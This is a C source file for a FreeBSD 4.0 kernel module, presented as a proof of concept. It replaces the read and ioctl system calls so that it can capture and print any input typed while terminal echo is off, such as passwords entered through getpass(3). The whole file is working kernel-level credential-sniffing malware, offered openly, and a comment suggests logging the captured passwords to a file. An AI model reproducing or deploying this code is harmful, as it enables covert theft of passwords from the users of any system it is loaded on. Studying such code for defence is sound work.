/* 
 * KLD by vecna@s0ftpj.org for FreeBSD 4.0 
 * This module shows how to intercept getpass(3) function and print anything
 * that is typed without terminal echo.
 * Sorry for my english, I like only milanese.
 */

#include <sys/param.h>
#include <sys/proc.h>
#include <sys/module.h>
#include <sys/kernel.h>
#include <sys/systm.h>
#include <sys/syscall.h>
#include <sys/sysent.h>
#include <sys/sysproto.h>
#include <sys/linker.h>
#include <sys/ttycom.h>

#include <termios.h>

static int procnum;

static int piove_ioctl(struct proc *p, struct ioctl_args *uap)
	{
	if(uap->com == TIOCSETAF)
		{
		struct termios *check;

		check =(struct termios *) uap->data;
		/* tnx to LordFelix :) */
		if(!(check->c_lflag & ECHO))
			procnum =p->p_pid;
		}

	return ioctl(p, uap);
	}

static int piove_read(struct proc *p, struct read_args *uap)
	{
	int ret;

	ret =read(p, uap);

	if(procnum)
		if(p->p_pid == procnum)
			{
			char *charptr =uap->buf;
			charptr[p->p_retval[0]] =0x00;

			/* example of reading password, is nice log on
			 * defined file, but this kld is only proof of
			 * concet :) 
			 */
			uprintf("pid [%d] on terminal without echo [%s]\n",
				procnum, charptr);
			procnum = 0;
			}

	return ret;
	}

static struct sysent piove[2] = 
	{
	{ 3, (sy_call_t *) piove_read  },
	{ 3, (sy_call_t *) piove_ioctl }
	};

static int init_module(module_t mod, int cmd, void *arg)
	{
        int ret = 0;

        switch (cmd) 
		{
		case MOD_LOAD:
			sysent[SYS_read] =piove[0];
			sysent[SYS_ioctl] =piove[1];
			uprintf(" getpass(3) kernel sniffer loaded\n");
			break;
		case MOD_UNLOAD:
			sysent[SYS_read].sy_call =(sy_call_t *)read;
			sysent[SYS_ioctl].sy_call =(sy_call_t *)ioctl;
			uprintf(" piove kld unloaded\n");
			break;
		default:
			ret = EINVAL;
			break;
		}
        return(ret);
	}

static struct moduledata piove_moddata =
	{
	"piove",
	init_module,
	NULL
	};

DECLARE_MODULE(syscall, piove_moddata, SI_SUB_DRIVERS, SI_ORDER_MIDDLE);
